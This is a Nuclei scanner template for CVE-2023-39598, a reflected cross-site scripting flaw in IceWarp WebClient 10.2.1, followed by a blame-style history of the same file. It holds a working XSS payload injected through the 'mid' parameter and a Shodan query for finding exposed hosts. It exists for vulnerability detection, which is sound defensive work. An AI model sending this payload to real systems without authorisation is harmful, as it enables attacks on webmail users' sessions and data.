nuclei-templates/http/cves/2023/CVE-2023-39598.yaml

id: CVE-2023-39598

info:
  name: IceWarp Email Client - Cross Site Scripting
  author: Imjust0
  severity: medium
  description: |
    Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  reference:
    - https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39598
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39598
    - https://medium.com/%40muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-39598
    cwe-id: CWE-79
    epss-score: 0.00456
    epss-percentile: 0.72443
    cpe: cpe:2.3:a:icewarp:webclient:10.2.1:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: icewarp
    product: webclient
    shodan-query: title:"icewarp"
  tags: cve,cve2023,xss,icewarp

http:
  - method: GET
    path:
      - '{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}"><img src=x onerror=confirm(document.domain)>'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<img src=x onerror=confirm(document.domain)>"
          - "icewarp"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a00463044022038e1af900da5190ccc1302130ecf070c766dbb7257179f6f5d439e7c9d2ae3c70220415f65fa01ae36b229465c58ec4057e77acf23bfa43ba89d2b4d20831f83b7b8:922c64590222798bb761d5b6d8e72950
minor update 2023-09-10 01:26:17 +00:00			`id: CVE-2023-39598`

Create CVE-2023-39598.yaml This is the CVE-2023-39598 discovered by Muthumohanprasath aka Imjust0. 2023-09-09 20:25:23 +00:00			`info:`
minor update 2023-09-10 01:26:17 +00:00			`name: IceWarp Email Client - Cross Site Scripting`
Create CVE-2023-39598.yaml This is the CVE-2023-39598 discovered by Muthumohanprasath aka Imjust0. 2023-09-09 20:25:23 +00:00			`author: Imjust0`
			`severity: medium`
minor update 2023-09-10 01:26:17 +00:00			`description: \|`
			`Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.`
Create CVE-2023-39598.yaml This is the CVE-2023-39598 discovered by Muthumohanprasath aka Imjust0. 2023-09-09 20:25:23 +00:00			`reference:`
minor update 2023-09-10 01:26:17 +00:00			`- https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-39598`
			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39598`
TemplateMan Update [Wed Nov 8 06:56:05 UTC 2023] :robot: 2023-11-08 06:56:05 +00:00			`- https://medium.com/%40muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c`
templateman update 2023-10-14 11:27:55 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.1`
			`cve-id: CVE-2023-39598`
			`cwe-id: CWE-79`
TemplateMan Update [Thu Nov 9 06:04:51 UTC 2023] :robot: 2023-11-09 06:04:52 +00:00			`epss-score: 0.00456`
TemplateMan Update [Tue Dec 12 11:07:51 UTC 2023] :robot: 2023-12-12 11:07:52 +00:00			`epss-percentile: 0.72443`
templateman update 2023-10-14 11:27:55 +00:00			`cpe: cpe:2.3:a:icewarp:webclient:10.2.1:::::::*`
minor update 2023-09-10 01:26:17 +00:00			`metadata:`
Added Impact 2023-09-27 15:51:13 +00:00			`verified: "true"`
minor update 2023-09-10 01:26:17 +00:00			`max-request: 1`
templateman update 2023-10-14 11:27:55 +00:00			`vendor: icewarp`
			`product: webclient`
minor update 2023-09-10 01:26:17 +00:00			`shodan-query: title:"icewarp"`
			`tags: cve,cve2023,xss,icewarp`

Create CVE-2023-39598.yaml This is the CVE-2023-39598 discovered by Muthumohanprasath aka Imjust0. 2023-09-09 20:25:23 +00:00			`http:`
			`- method: GET`
			`path:`
minor update 2023-09-10 01:26:17 +00:00			`- '{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}"><img src=x onerror=confirm(document.domain)>'`

Create CVE-2023-39598.yaml This is the CVE-2023-39598 discovered by Muthumohanprasath aka Imjust0. 2023-09-09 20:25:23 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
minor update 2023-09-10 01:26:17 +00:00			`- "<img src=x onerror=confirm(document.domain)>"`
			`- "icewarp"`
			`condition: and`

matcher update 2023-09-10 14:34:42 +00:00			`- type: word`
			`part: header`
			`words:`
			`- "text/html"`

Create CVE-2023-39598.yaml This is the CVE-2023-39598 discovered by Muthumohanprasath aka Imjust0. 2023-09-09 20:25:23 +00:00			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Fri Dec 29 09:30:43 UTC 2023] :robot: 2023-12-29 09:30:44 +00:00			`# digest: 490a00463044022038e1af900da5190ccc1302130ecf070c766dbb7257179f6f5d439e7c9d2ae3c70220415f65fa01ae36b229465c58ec4057e77acf23bfa43ba89d2b4d20831f83b7b8:922c64590222798bb761d5b6d8e72950`